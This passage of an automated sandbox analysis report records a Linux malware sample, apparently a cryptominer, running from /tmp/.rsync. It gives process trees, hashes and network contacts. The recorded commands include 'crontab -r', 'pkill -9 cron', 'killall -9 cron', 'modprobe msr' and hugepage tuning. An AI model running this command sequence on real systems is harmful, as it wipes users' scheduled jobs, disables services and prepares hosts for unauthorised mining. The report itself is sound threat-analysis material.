| File opened for reading | /proc/1188/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1197/stat | /bin/ps | N/A |
| File opened for reading | /proc/1189/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/683/stat | /bin/ps | N/A |
| File opened for reading | /proc/2/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/82/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/467/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1273/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/184/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1531/stat | /bin/ps | N/A |
| File opened for reading | /proc/1288/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1503/status | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node0 -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/grep
[grep AMD Ryzen]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep Intel]
/bin/cat
[cat /proc/cpuinfo]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/bin/ps
[ps x]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
/tmp/.rsync/a/cron
[./cron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 89.187.167.5:443 | | tcp |
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.rsync/a/cron
[/tmp/.rsync/a/cron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240418-en
Max time kernel
11s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240611-en
Max time kernel
1s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/310/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/601/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/ps | N/A |
| File opened for reading | /proc/279/stat | /bin/ps | N/A |
| File opened for reading | /proc/596/status | /bin/ps | N/A |
| File opened for reading | /proc/21/status | /bin/ps | N/A |
| File opened for reading | /proc/310/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/599/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/674/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/10/stat | /bin/ps | N/A |
| File opened for reading | /proc/20/status | /bin/ps | N/A |
| File opened for reading | /proc/18/status | /bin/ps | N/A |
| File opened for reading | /proc/74/status | /bin/ps | N/A |
| File opened for reading | /proc/145/status | /bin/ps | N/A |
| File opened for reading | /proc/147/stat | /bin/ps | N/A |
| File opened for reading | /proc/668/status | /bin/ps | N/A |
| File opened for reading | /proc/147/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/27/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/137/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/10/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/pkill | N/A |
| File opened for reading | /proc/602/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/664/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/5/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/107/stat | /bin/ps | N/A |
| File opened for reading | /proc/140/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/596/stat | /bin/ps | N/A |
| File opened for reading | /proc/674/stat | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/281/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/599/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/stat | /bin/ps | N/A |
| File opened for reading | /proc/29/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/644/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/279/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/602/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/277/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/596/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/status | /bin/ps | N/A |
| File opened for reading | /proc/324/status | /bin/ps | N/A |
| File opened for reading | /proc/640/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/281/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/104/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/320/status | /bin/ps | N/A |
| File opened for reading | /proc/147/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /bin/ps | N/A |
| File opened for reading | /proc/140/status | /bin/ps | N/A |
| File opened for reading | /proc/29/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/279/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/9/stat | /bin/ps | N/A |
| File opened for reading | /proc/29/stat | /bin/ps | N/A |
| File opened for reading | /proc/21/cmdline | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libnss_files.so.2
[/tmp/.rsync/c/lib/32/libnss_files.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libresolv-2.23.so
[/tmp/.rsync/c/lib/32/libresolv-2.23.so]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
132s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
/tmp/.rsync/a/cron
[./cron]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.15:443 | | tcp |
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libresolv.so.2
[/tmp/.rsync/c/lib/32/libresolv.so.2]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/tsm
[/tmp/.rsync/c/lib/32/tsm]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
14s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /sbin/sysctl | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/76/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/120/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/384/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/2/status | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /bin/ps | N/A |
| File opened for reading | /proc/23/status | /bin/ps | N/A |
| File opened for reading | /proc/10/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/725/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/71/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/status | /bin/ps | N/A |
| File opened for reading | /proc/748/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/755/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/677/status | /bin/ps | N/A |
| File opened for reading | /proc/728/stat | /bin/ps | N/A |
| File opened for reading | /proc/387/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/748/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/687/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /bin/ps | N/A |
| File opened for reading | /proc/700/stat | /bin/ps | N/A |
| File opened for reading | /proc/78/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/386/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/756/status | /bin/ps | N/A |
| File opened for reading | /proc/387/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/170/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/723/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/24/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/72/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/170/stat | /bin/ps | N/A |
| File opened for reading | /proc/384/status | /bin/ps | N/A |
| File opened for reading | /proc/81/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/269/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/676/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/status | /bin/ps | N/A |
| File opened for reading | /proc/667/status | /bin/ps | N/A |
| File opened for reading | /proc/725/stat | /bin/ps | N/A |
| File opened for reading | /proc/19/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /bin/ps | N/A |
| File opened for reading | /proc/16/status | /bin/ps | N/A |
| File opened for reading | /proc/727/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/16/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/6/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/731/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/12/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/727/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/705/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/387/stat | /bin/ps | N/A |
| File opened for reading | /proc/151/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/363/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/3/cmdline | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node* -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/grep
[grep AMD Ryzen]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep Intel]
/bin/cat
[cat /proc/cpuinfo]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/bin/ps
[ps x]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
131s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1126/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1130/status | /bin/ps | N/A |
| File opened for reading | /proc/89/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/202/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1193/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/170/stat | /bin/ps | N/A |
| File opened for reading | /proc/445/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/137/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1352/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1262/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1044/status | /bin/ps | N/A |
| File opened for reading | /proc/1372/stat | /bin/ps | N/A |
| File opened for reading | /proc/30/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1114/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1167/status | /bin/ps | N/A |
| File opened for reading | /proc/1223/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/203/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1294/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1496/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/317/stat | /bin/ps | N/A |
| File opened for reading | /proc/953/status | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1130/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1262/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1122/status | /bin/ps | N/A |
| File opened for reading | /proc/1186/stat | /bin/ps | N/A |
| File opened for reading | /proc/1494/stat | /bin/ps | N/A |
| File opened for reading | /proc/684/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/914/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1038/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1085/status | /bin/ps | N/A |
| File opened for reading | /proc/1247/stat | /bin/ps | N/A |
| File opened for reading | /proc/914/status | /bin/ps | N/A |
| File opened for reading | /proc/1147/status | /bin/ps | N/A |
| File opened for reading | /proc/30/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/312/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/655/status | /bin/ps | N/A |
| File opened for reading | /proc/914/stat | /bin/ps | N/A |
| File opened for reading | /proc/1182/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /bin/ps | N/A |
| File opened for reading | /proc/1183/stat | /bin/ps | N/A |
| File opened for reading | /proc/7/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/16/stat | /bin/ps | N/A |
| File opened for reading | /proc/1044/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1061/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1143/status | /bin/ps | N/A |
| File opened for reading | /proc/1072/stat | /bin/ps | N/A |
| File opened for reading | /proc/1126/stat | /bin/ps | N/A |
| File opened for reading | /proc/471/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/26/status | /bin/ps | N/A |
| File opened for reading | /proc/171/stat | /bin/ps | N/A |
| File opened for reading | /proc/78/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/245/stat | /bin/ps | N/A |
| File opened for reading | /proc/708/status | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/158/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/31/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/202/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1505/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/413/stat | /usr/bin/killall | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep cron]
/bin/ps
[ps x]
/bin/rm
[rm -rf .proc]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.20:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 195.181.164.16:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:54
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.rsync/c/lib/32/libc.so.6
[/tmp/.rsync/c/lib/32/libc.so.6]